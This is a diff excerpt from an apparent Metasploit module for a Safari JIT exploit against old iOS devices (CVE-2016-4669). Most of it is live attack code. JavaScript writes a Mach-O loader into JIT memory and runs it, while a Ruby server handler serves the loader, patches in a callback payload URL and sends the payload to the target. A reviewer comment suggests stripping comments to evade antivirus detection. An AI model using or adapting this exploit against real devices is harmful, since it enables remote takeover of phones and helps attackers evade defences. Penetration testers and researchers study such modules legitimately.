modules/exploits/apple_ios/browser/safari_jit.rb

```diff
@@ -0,0 +1,549 @@
+        for (var i=0; i<loader.length; i++) {
+          var x = loader[i];
+          write32(jitCodeForCall+i*4, x);
+        }
+
+        // pass JSCell::destroy pointer and
+        // the macho file as arguments to our
+        // macho file loader, so it can get dylib cache slide
+        var nextBuf = read32(addrOf(macho) + 0x14);
+        // we pass parameters to the loader as a list of 32-bit words
+        // places right before the start
+        write32(jitCodeForCall-4, JSCell_destroy);
+        write32(jitCodeForCall-8, nextBuf);
+        log(nextBuf.toString(16));
+        //logFinalize();
+        // start our macho loader
+        exec(true);
+        alert("no go");
+        logFinalize();
+
+        return;
+      }
+
+      try {
+        function asciiToUint8Array(str) {
+
+          var len = Math.floor((str.length + 4)/4) * 4;
+          var bytes = new Uint8Array(len);
+
+          for (var i=0; i<str.length; i++) {
+            var code = str.charCodeAt(i);
+            bytes[i] = code & 0xff;
+          }
+
+          return bytes;
+        }
+
+        // loads base64 encoded payload from the server and converts
+        // it into a Uint32Array
+        function loadAsUint32Array(path) {
+          var xhttp = new XMLHttpRequest();
+          xhttp.open("GET", path+"?cache=" + new Date().getTime(), false);
+          xhttp.send();
+          var payload = atob(xhttp.response);
+          payload = asciiToUint8Array(payload);
+          return new Uint32Array(payload.buffer);
+        }
+
+        var loader = loadAsUint32Array("loader.b64");
+        var macho = loadAsUint32Array("macho.b64");
+        setTimeout(function() {main(loader, macho);}, 50);
+      } catch (e) {
+        alert(e + "\\n" + e.stack);
+      }
+    JS
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Request #{request.uri} from #{request['User-Agent']}")
+    if request.uri.starts_with? '/loader.b64'
+      loader_data = exploit_data('CVE-2016-4669', 'loader')
+      loader_data = Rex::Text.encode_base64(loader_data)
+      send_response(cli, loader_data, { 'Content-Type' => 'application/octet-stream' })
+      return
+    elsif request.uri.starts_with? '/macho.b64'
+      loader_data = exploit_data('CVE-2016-4669', 'macho')
+      payload_url = "http://#{Rex::Socket.source_address('1.2.3.4')}:#{srvport}/payload"
+      payload_url_index = loader_data.index('PAYLOAD_URL_PLACEHOLDER')
+      loader_data[payload_url_index, payload_url.length] = payload_url
+      loader_data = Rex::Text.encode_base64(loader_data)
+      send_response(cli, loader_data, { 'Content-Type' => 'application/octet-stream' })
+      return
+    elsif request.uri.starts_with? '/payload'
+      print_good('Target is vulnerable, sending payload!')
+      send_response(cli, payload.raw, { 'Content-Type' => 'application/octet-stream' })
+      return
+    end
+
+    html = <<~HTML
+      <html>
+      <body>
+      <script>
+      #{exploit_js}
```

Comment:
there are a LOT of comments in this file, maybe strip them out before sending to cut down on the file size to the old phone, and remove some possible strings for AV to look for.